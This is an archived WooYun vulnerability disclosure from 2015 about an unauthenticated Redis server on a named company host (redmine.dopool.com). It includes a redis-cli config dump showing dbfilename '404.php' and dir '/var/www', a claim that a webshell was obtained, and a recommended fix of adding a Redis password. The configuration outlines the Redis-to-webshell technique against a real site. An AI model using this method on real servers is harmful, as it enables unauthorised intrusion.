乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
闪动科技某站服务配置不当,已getshell
[l9h8@localhost ~]$ redis-3.0.5/src/redis-cli -h redmine.dopool.comredmine.dopool.com:6379> config get * 1) "dbfilename" 2) "404.php" 3) "requirepass" 4) "" 5) "masterauth" 6) "" 7) "unixsocket" 8) "" 9) "logfile" 10) "/usr/local/redis/log/redis.log" 11) "pidfile" 12) "/var/run/redis.pid" 13) "maxmemory" 14) "434217728" 15) "maxmemory-samples" 16) "3" 17) "timeout" 18) "0" 19) "tcp-keepalive" 20) "0" 21) "auto-aof-rewrite-percentage" 22) "100" 23) "auto-aof-rewrite-min-size" 24) "67108864" 25) "hash-max-ziplist-entries" 26) "512" 27) "hash-max-ziplist-value" 28) "64" 29) "list-max-ziplist-entries" 30) "512" 31) "list-max-ziplist-value" 32) "64" 33) "set-max-intset-entries" 34) "512" 35) "zset-max-ziplist-entries" 36) "128" 37) "zset-max-ziplist-value" 38) "64" 39) "lua-time-limit" 40) "5000" 41) "slowlog-log-slower-than" 42) "10000" 43) "slowlog-max-len" 44) "128" 45) "port" 46) "6379" 47) "tcp-backlog" 48) "511" 49) "databases" 50) "16" 51) "repl-ping-slave-period" 52) "10" 53) "repl-timeout" 54) "60" 55) "repl-backlog-size" 56) "1048576" 57) "repl-backlog-ttl" 58) "3600" 59) "maxclients" 60) "10000" 61) "watchdog-period" 62) "0" 63) "slave-priority" 64) "100" 65) "min-slaves-to-write" 66) "0" 67) "min-slaves-max-lag" 68) "10" 69) "hz" 70) "10" 71) "no-appendfsync-on-rewrite" 72) "no" 73) "slave-serve-stale-data" 74) "yes" 75) "slave-read-only" 76) "no" 77) "stop-writes-on-bgsave-error" 78) "yes" 79) "daemonize" 80) "yes" 81) "rdbcompression" 82) "yes" 83) "rdbchecksum" 84) "yes" 85) "activerehashing" 86) "yes" 87) "repl-disable-tcp-nodelay" 88) "no" 89) "aof-rewrite-incremental-fsync" 90) "yes" 91) "appendonly" 92) "no" 93) "dir" 94) "/var/www" 95) "maxmemory-policy" 96) "allkeys-lru" 97) "appendfsync" 98) "everysec" 99) "save"100) "900 1 300 10 60 10000"101) "loglevel"102) "notice"103) "client-output-buffer-limit"104) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"105) "unixsocketperm"106) "0"107) "slaveof"108) ""109) "notify-keyspace-events"110) ""111) "bind"112) ""
网站根目录下有phpinfo.php可获取根目录.以便getshell
redis 加密码
危害等级:低
漏洞Rank:5
确认时间:2015-10-30 15:53
谢谢!
暂无